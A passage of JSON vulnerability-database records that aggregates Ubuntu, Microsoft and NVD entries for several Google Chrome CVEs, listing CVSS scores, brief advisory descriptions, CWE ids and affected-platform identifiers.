false, "userInteractionRequired": true, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21161"], "modified": "2021-03-09T00:00:00", "id": "UB:CVE-2021-21161", "href": "https://ubuntu.com/security/CVE-2021-21161", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:21:37", "description": "Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72\nallowed a remote attacker to potentially exploit heap corruption via a\ncrafted HTML page.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[amurray](<https://launchpad.net/~amurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T00:00:00", "type": "ubuntucve", "title": "CVE-2021-21159", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21159"], "modified": "2021-03-09T00:00:00", "id": "UB:CVE-2021-21159", "href": "https://ubuntu.com/security/CVE-2021-21159", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:21:43", "description": "Heap buffer overflow in WebAudio in Google Chrome prior to 89.0.4389.72\nallowed a remote attacker to potentially exploit heap corruption via a\ncrafted HTML page.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[amurray](<https://launchpad.net/~amurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T00:00:00", "type": "ubuntucve", "title": "CVE-2021-21160", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21160"], "modified": "2021-03-09T00:00:00", "id": 
"UB:CVE-2021-21160", "href": "https://ubuntu.com/security/CVE-2021-21160", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:34:34", "description": "Use after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a\nremote attacker to potentially exploit heap corruption via a crafted HTML\npage.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-25T00:00:00", "type": "ubuntucve", "title": "CVE-2019-13720", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2019-11-25T00:00:00", "id": "UB:CVE-2019-13720", "href": "https://ubuntu.com/security/CVE-2019-13720", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:21:34", "description": "Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote\nattacker to potentially exploit heap corruption via a crafted HTML page.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[amurray](<https://launchpad.net/~amurray>) | The Debian chromium source package is called chromium-browser in Ubuntu 
\n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T00:00:00", "type": "ubuntucve", "title": "CVE-2021-21166", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-03-09T00:00:00", "id": "UB:CVE-2021-21166", "href": "https://ubuntu.com/security/CVE-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2022-10-27T00:22:08", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. 
Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-04T20:03:59", "type": "mscve", "title": "Chromium CVE-2021-21164: Insufficient data validation in Chrome for iOS", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21164"], "modified": "2021-03-04T20:03:59", "id": "MS:CVE-2021-21164", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21164", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-27T00:22:08", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. 
Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-04T20:03:59", "type": "mscve", "title": "Chromium CVE-2021-21163: Insufficient data validation in Reader Mode", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21163"], "modified": "2021-03-04T20:03:59", "id": "MS:CVE-2021-21163", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21163", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-27T00:22:08", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. 
Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-04T20:03:58", "type": "mscve", "title": "Chromium CVE-2021-21162: Use after free in WebRTC", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21162"], "modified": "2021-03-04T20:03:58", "id": "MS:CVE-2021-21162", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21162", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-27T00:22:08", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. 
Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-04T20:03:57", "type": "mscve", "title": "Chromium CVE-2021-21161: Heap buffer overflow in TabStrip", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21161"], "modified": "2021-03-04T20:03:57", "id": "MS:CVE-2021-21161", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21161", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-27T00:22:08", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. 
Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-04T20:03:55", "type": "mscve", "title": "Chromium CVE-2021-21159: Heap buffer overflow in TabStrip", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21159"], "modified": "2021-03-04T20:03:55", "id": "MS:CVE-2021-21159", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21159", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-27T00:22:08", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. 
Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-04T20:03:56", "type": "mscve", "title": "Chromium CVE-2021-21160: Heap buffer overflow in WebAudio", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21160"], "modified": "2021-03-04T20:03:56", "id": "MS:CVE-2021-21160", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21160", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-27T00:22:08", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. 
Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n\n**This CVE has been reported to be exploited in the wild.**\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-04T20:04:01", "type": "mscve", "title": "Chromium CVE-2021-21166: Object lifecycle issue in audio", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-03-04T20:04:01", "id": "MS:CVE-2021-21166", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T13:33:11", "description": "Insufficient data validation in Chrome on iOS in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", 
"baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-09T18:15:00", "type": "cve", "title": "CVE-2021-21164", "cwe": ["CWE-346"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21164"], "modified": "2021-12-03T17:11:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-21164", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21164", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:33:08", "description": "Insufficient data validation in Reader Mode in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page and a malicious server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": 
"REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-09T18:15:00", "type": "cve", "title": "CVE-2021-21163", "cwe": ["CWE-346"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21163"], "modified": "2021-12-03T16:52:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-21163", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21163", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:33:05", "description": "Use after free in WebRTC in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "cve", "title": "CVE-2021-21162", "cwe": ["CWE-416"], "bulletinFamily": "NVD", 
"cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21162"], "modified": "2021-12-03T16:49:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-21162", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21162", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:34:02", "description": "Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "cve", "title": "CVE-2021-21161", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21161"], "modified": "2021-12-03T17:06:00", "cpe": ["cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:34", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2021-21161", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21161", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*"]}, {"lastseen": "2022-07-07T14:22:36", "description": "Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T18:15:00", "type": "cve", "title": "CVE-2021-21159", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
